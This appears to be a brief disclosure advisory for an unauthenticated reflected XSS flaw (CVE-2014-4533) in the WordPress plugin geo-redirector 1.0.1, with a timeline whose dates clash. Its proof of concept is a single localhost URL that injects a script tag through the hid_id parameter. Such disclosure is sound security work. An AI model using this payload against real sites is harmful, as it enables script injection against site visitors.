wp-plugin : geo-redirector – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : geo-redirector

 

Effected Version : 1.0.1 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Prajal Kulkarni

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://127.0.0.1/wordpress/wp-content/wp-plugs/georedirector/ajax_functions.php?hid_id=hid_id%27%3E%3Cscript%3Ealert%282%29%3C/script%3E

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-21

 
Plugin Status : Updated on 2014-01-11
 
Public Disclosure : April 25, 2014
 
CVE Number : CVE-2014-4533

 
Plugin Description :
 
This is a WordPress plugin , this plugin will allow you to redirect your URLs according to the visitors geographical location. And you can manage redirect the visitor given radios inside or outside.This plugin was developed by AnushkaKR.

Leave a Reply

Your email address will not be published. Required fields are marked *